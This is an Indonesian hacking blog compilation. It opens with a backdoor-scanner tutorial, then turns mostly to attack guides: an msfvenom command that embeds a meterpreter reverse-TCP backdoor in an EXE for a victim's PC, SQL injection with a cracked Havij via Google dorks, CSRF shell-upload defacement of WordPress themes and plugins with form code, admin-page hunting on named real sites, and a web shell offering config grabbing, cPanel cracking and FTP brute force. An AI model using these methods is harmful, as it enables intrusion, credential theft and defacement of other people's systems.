Termux ID: Artikel -->

    Social Items

Home / Artikel
lets say hello heters !!!
      Mlm semua,,udah lama hibernasi akhirnya bisa share seputar ilmu gaib di sini ea...maaf yak admin di sini jarang post di karnakan ada yg lagi patah hati,,jadi homo,,mulung dll.
   
     Ok langsung aja kali ini aink share cara Menemukan File Backdoor di suatu web,yah caranya mungkin udah basi tapi masih banyak admin web yg rada" geblek :v kagak tau wkwkw ya siapa tau tutor kali ini bisa membantu admin web menjadi admin yg gesit :v


Ikutin Langkahnya Tod !

  • Download dulu backdoor scanner di SINI (Pasword RAR {adithomo123}
  • Extract file rar nya terus upload file BackdoorScanner.php ke web yg ingin di scan lalu panngil file yg di upload tadi misalnya http://nekopoi.co.li/upload/backdoorscanner.php


                                               Kurang lebih seperti itulah penampakannya....

  • beri centang di semua kecuali yg terakhir




                                                         Penampakan Keduanya Gan


  • Dan Terakhir Klik START SCAN
                                                           Sekarang coba kita lihat hasilnya



Coba Lihat yg berwarna hijau..ada 4 Shell Backdoor :v Sadeees....sekarang coba kita lihat sheel yg telah terdeteksi.....
Ada Yg Upload Sheel Indo Exploit :v tinggal hapus dah file yg terdeteksi tadi done :v lanjut nge JAV


     Oke sekian tutor sampah kali ini moga" bisa berguna buat admin supaya menjadi admin yg gesit ..cepat tanggap :v

Kalo ada yg kurang jelas atau mau tanya" silahkan tanya di SINI Dan Jangan Lupa Like Fanspage Kami Di                                                                                        SONO













Cara Menemukan File Backdoor Di Suatu WEB

Gambar Hanya Pemanis.

Cara Mencari Halaman Login Admin

Sore gaes, lama juga gw ga nongol, hehe. Jadi pengen peluk kalian semua satu - satu, Unchh.
Kali ini gw balik dengan Tutorial Cara Mencari Halaman Login Admin.

Pernah gak kalian, abis maen SQLi misalnya, user/pass udah dapet, password udah berhasil di decrypt, tapi ganemu Halaman Login Admin? Sering. Nah, disini gw bawain beberapa cara nemuin halaman terkutuk itu :P

1. Havij.
Ya, Havij. Havij ini salah satu alat yang membantu penguji penetrasi untuk mencari dan mengeksploitasi kelemahan SQL Injection pada halaman web. Dan disana ada fitur admin finder nya loh.

Tutorial SQLi dengan Havij


2.  Admin Finder.
Di dunia ini, coba gw tanya, ada berapa tool adminfinder? Banyak :P Kalian bisa gunain salah satu dari mereka. Misal, dari sini. 

3. View Source.
Lahh? Kok View Source? 
Mungkin beberapa dari kalian belum tau ya :P Jadi kita intip2 source code web tadi.  
Lihat contoh ini,


 Disitu bisa kita lihat, sebelum dir uploaded_files , ada dir lagi dengan nama dashboard, kalian tau kan artinya? Wkwk.

4 . Intip Sampai ke Developernya.
Iya, cara ini emang gak umum banget, juga ini ada unsur - unsur factor face biasanya, wkwk.
Kebanyakan web, di bagian footer bakal ada nama developer dari web tadi. Nah, kita intip kesana, yuk gw tunjukin.
1. Target : http://mer99furniture.com/
2. Lihat ke pojok kanan bawah. Disitu tertulis Development by Mobista Technologies.
3. Dari web Mobista Technologies, kita intip - intip lagi. Dan gw nemu, di sini.
4. Kebetulan disana kita bisa lihat demo back-end dari web-web hasil karya Mobista Technologies. Dan salah satunya di sini.
5.Tinggal kita sama kan dengan target pertama, dan .. Gotcha! I got you! Halaman admin target berada di site/ew-admin. Persis seperti demo di web Mobista Technologies.

Mungkin cara terakhir agak rumit karena emang kita masuk banget sampe intip - intip ke web developer nya, hehe. But, Trust Me, it works.

Sekian postingan gw kali ini. Sampe Ketemu di postingan gw selanjutanya.

Cara Mencari Halaman Login Admin

Hello gaisss selamat siang :v
Di sini gua sebagai member maxteroit.com mau memberikan sedikit tutorial tentang "Cara Menyisipkan Backdoor ke File EXE" ya udah ndak usah banyak cing cong :v

Alat dan Bahan:

  1. Distro Linux ( distro pentest sangat di sarankan :D )
  2. Metasploit (msfvenom dan msfconsole)
  3. Brain :v
Langsung eksekusi aja :v

  1. Pilih salah satu aplikasi yang mau di sisipin backdoor
  2. Nah di sini gua menggunakan yumi.exe
  3. Lalu masukin command di bawah (untuk 32bit atau x86)
    4. sudo msfvenom -a x86 --platform windows -x "yumi.exe" -k -p windows/meterpreter/reverse_tcp LHOST=192.168.43.252 LPORT=8080 -e x86/shikata_ga_nai "\x00" -f exe -o "yumibackdoor.exe"
    Lihat gambar kalau kurang jelas
  4. atau command di bawah ini (untuk 64 bit atau x64)
    5. sudo msfvenom -a x64 --platform windows -x "yumi.exe" -k -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.252 LPORT=8080 "\x00" -f exe -o "yumibackdoor.exe"
  5. Isi LHOST dengan IP agan masing"
  6. Isi LPORT dengan port yang akan di gunakan isi terserah boleh
  7. Enter dan masukkan password akun, jika selesai muncul log seperti gambar
  8. Sekarang jalanin metasploitnya dengan konfigurasi berikut
  9. Ingat LHOST dan LPORT isi punya agan sendiri :D
  10. Nah lalu pindah tuh ke PC korban :D
  11. Setelah di buka dan mendapat SESSION cepat cepat migrate ke exploler.exe
  12. Selamat Mengeksploitasi PC korban :v

Menyisipkan Backdoor ke File EXE


Malem mblo :p
Lama gak update yaa :3

Kali ini gw mau share Tutorial SQL Injection Using Havij. 
Simak yaa :*

Bahan :
1. Dork
Sedot
2. Havij 1.17 Full Crack
Download 

Langkah - langkah :
1. Dorking ke google.

2. Tambahin string (') di belakang url target. Kalo error berarti vuln.

3. Masukin ke Havij.

4. Klik Analyze.

5. Klik 'Get Tables'.

6. Kita cari coloumn yg isinya mungkin ada username+password atau data buat login.

7. Kalo udah cari, klik 'Get Coloumn'.

8. Nahh, abis itu kita cari data nya. Username, password, email dll.

9. Klik 'Get Data'.

Taraaa, keluar deh username + passwordnya. :)

Kalo masih belum jelas, bisa liat video dibawah ini.


Okee, sekian tutorial gw kali ini, kalo masih bingung, bisa komen di bawah ^.^
Sampe ketemu di post berikutnya :*
.
Regards,
Berandal, [OWL SQUAD]

Tutorial SQL Injection [HAVIJ]

Malem fans :p
Lama yak gaketemu :v

Kali ini gw mau share Tutorial Deface Wordpress Plugin WP-DreamWork Gallery
Lansung ajaaa

Bahan: 
1. Dork : Kembangin lagi pake otak vokepers kalian :p
inurl:/wp-content/plugins/wp-dreamworkgallery/
2. CSRF :
Klik disini

Langkah - langkah :
1. Dorking ke gugel :v

2. Pilih salah satu site.

3. Masukin target lu ke CSRF nya.

4. Buka CSRF nya.

5. Pilih file/shell yg mau lu upload.

6. Kalo sukses bakal ada nama file kalian beserta file akses nya :)

7. Tinggal buka aja deh :)

Kalo masih belum jelas, bisa liat video dibawah :)


Okee, sekian tutorial gw kali ini. Kalo masih ada yg belum ngerti, ada kolom komentar di bawah :)
.
Regards,
Berandal. [OWL SQUAD]

Deface Wordpress Plugin WP-DreamWorkGallery

 Deface Wordpress Themes Multimedia1

 

Hello sobat maxteroit, kali ini saya (Berandal) akan share my new POC about deface wordpress, metodenya yaitu Wordpress themes multimedia1 shell upload vulnerability.
Berikut dokumentasi yg telah saya upload ke web tempat upload poc hacking :

   
Wordpress Themes Multimedia1 Shell Upload Vulnerability | CSRF
Author : Berandal
Google Dork: inurl:/wp-content/themes/multimedia1/
Tested on: Win 7, Linux
Blog : http://www.maxteroit.com/

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

[!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

[!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php
[*] CSRF:
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>


[*] ABOUT:

Facebook: https://www.facebook.com/owlsquad.id
Twitter: https://www.twitter.com/id_berandal
Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.

Deface Wordpress Themes Multimedia1



Tampilan Halaman Login



Haii, Kali ini gw mau share Shell buatan gw sendiri :) Shell ini gw recode dari IndoXploit Shell First Edition.
Thanks buat IndoXploit Coders Team. :)

Semua fitur dalam shell ini dibuat Auto.
Tinggal Klik-Klik sajaa.

Tampilan Shell

Fitur:

K-RDP Shell
-> Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.
Back Connect

CPanel/FTP Auto Deface:
-> Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp sajatidak semuanya bisa hanya web yang ftp nya sama dengan user/pass cpanel nya yang bisa otomatis di deface.

Config Grabb :
-> Popoji CMS
-> Voodoo CMS
-> Wordpress
-> Joomla
-> Drupal
-> Magento
-> Ellislab Devteam [CI]
-> Opencart
-> Prestashop
-> phpBB
-> Lokomedia
-> Sitelook
-> Bosweb
-> WHMCS
-> Cpanel

Jumping [error fixed] :
Jumping hpshere & Jumping /var/vhosts [ updated ]
Kelebihannyaa bisa langsung ambil nama domainnyaa :
Cpanel Crack [blank user/pass fixed]:
Fitur ini udah otomatis Grab Passwordnyaa dan juga otomatis mengambil info domain nya, ikutin saja petunjuknya .
SMTP Grabber :
Hanya mengambil info smtp joomla yg ada di config.
Auto edit user / MPC :
Udah otomatis edit seluruh user admin dari config *ga semuanya , cuma beberapa cms aja
Disetiap tools tertentu ada "NB" ikutin petunjuknya sajaa.

Dan fitur tambahan :

  1. Server Info.
  2. PHP Info.
  3. Who Is Lookup.
  4. Safe Mode.
  5. Shell Finder.
  6. FTP Brute Force.
  7. Bypass etc/passw.
  8. CMS Lokomedia Exploiter.
  9. CMS Balitbang Exploiter.
  10. Port Scan.
  11. Zip Menu, [Upload and Unzip, ZIP Backup, Unzip Manual].
  12. Shell Checker.
  13. Hash ID.
  14. String Encoder.
  15. Network [Bind Port, Back Connect, Metasploit Connection].
========================================================================
========================================================================
Selamat Menikmati :)

Spesial Thanks:
.

Regards,
Berandal, [OWL SQUAD]

[RELEASE] Berandal Shell First Edition V.1



Haii fans :P
Kali ini gw mau share Tutorial Deface Wordpress Theme Theagency. :)

Bahan:
1. Dork.
inurl:/wp-content/themes/theagency
2. Exploit.
/wp-content/themes/theagency/includes/uploadify/uploadify.php

3. CSRF.
 Ambil disini.

Langkah - Langkah:

1. Dorking ke google.

2. Pilih salah satu site.

3. Masukin exploitnya.

4. Vuln = Blank.

5. Masukin site ke CSRF.

6. Pilih file/shell/ yg mau lu upload.

7. Kalo file sukses ke upload, bakal muncul angka '1'.

Akses file? 
/wp-content/themes/theagency/includes/uploadify/uploads/namafile 
contoh:
http://google.com/wp-content/themes/theagency/includes/uploadify/uploads/namafile

Kalo masih kurang jelas, simak video tutorial gw :

 

Okee, sekian tutorial gw kali ini, semoga bermanfaat :)

Regards, 
Berandal, [OWL SQUAD]

Deface Wordpress Theme Theagency

Subscribe to: Posts (Atom)